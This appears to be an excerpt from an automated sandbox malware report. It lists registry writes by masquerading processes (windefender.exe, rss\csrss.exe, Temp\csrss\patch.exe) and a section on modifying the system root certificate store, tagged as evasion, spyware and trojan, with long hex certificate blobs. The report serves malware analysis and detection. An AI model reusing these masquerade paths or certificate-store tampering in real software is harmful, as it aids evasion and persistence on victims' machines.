Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-212 = "Pacific Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-732 = "Fiji Standard Time" C:\Users\Admin\Pictures\L668OyeExs0cF7hoU0qrfgo4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-81 = "Atlantic Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-392 = "Arab Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-1022 = "Bangladesh Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-32 = "Mid-Atlantic Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-622 = "Korea Standard Time" C:\Users\Admin\Pictures\L668OyeExs0cF7hoU0qrfgo4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-100 = "RD Gateway Quarantine Enforcement Client" C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-214 = "Pacific Daylight Time (Mexico)" C:\Users\Admin\Pictures\L668OyeExs0cF7hoU0qrfgo4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-132 = "US Eastern Standard Time" C:\Users\Admin\Pictures\L668OyeExs0cF7hoU0qrfgo4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-681 = "E. Australia Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-81 = "Atlantic Daylight Time" C:\Users\Admin\Pictures\L668OyeExs0cF7hoU0qrfgo4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-181 = "Mountain Daylight Time (Mexico)" C:\Users\Admin\Pictures\L668OyeExs0cF7hoU0qrfgo4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-101 = "Provides DHCP based enforcement for NAP" C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-222 = "Alaskan Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-561 = "SE Asia Daylight Time" C:\Users\Admin\Pictures\L668OyeExs0cF7hoU0qrfgo4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-461 = "Afghanistan Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-262 = "GMT Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-742 = "New Zealand Standard Time" C:\Users\Admin\Pictures\L668OyeExs0cF7hoU0qrfgo4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-832 = "SA Eastern Standard Time" C:\Users\Admin\Pictures\L668OyeExs0cF7hoU0qrfgo4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-511 = "Central Asia Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-681 = "E. Australia Daylight Time" C:\Users\Admin\Pictures\L668OyeExs0cF7hoU0qrfgo4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-291 = "Central European Daylight Time" C:\Windows\windefender.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 040000000100000010000000e4a68ac854ac5242460afd72481b2a440f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a41400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f392000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 0f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f0b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f007400000053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df01d0000000100000010000000918ad43a9475f78bb5243de886d8103c09000000010000000c000000300a06082b06010505070301030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47420000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 C:\Windows\rss\csrss.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 0f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 19000000010000001000000068cb42b035ea773e52ef50ecf50ec5290f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f0b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f007400000053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df01d0000000100000010000000918ad43a9475f78bb5243de886d8103c09000000010000000c000000300a06082b06010505070301030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae474040000000100000010000000acb694a59c17e0d791529bb19706a6e420000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 1400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f39030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a40f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a32000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 19000000010000001000000014c3bd3549ee225aece13734ad8ca0b81400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f39030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a40f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3040000000100000010000000e4a68ac854ac5242460afd72481b2a442000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e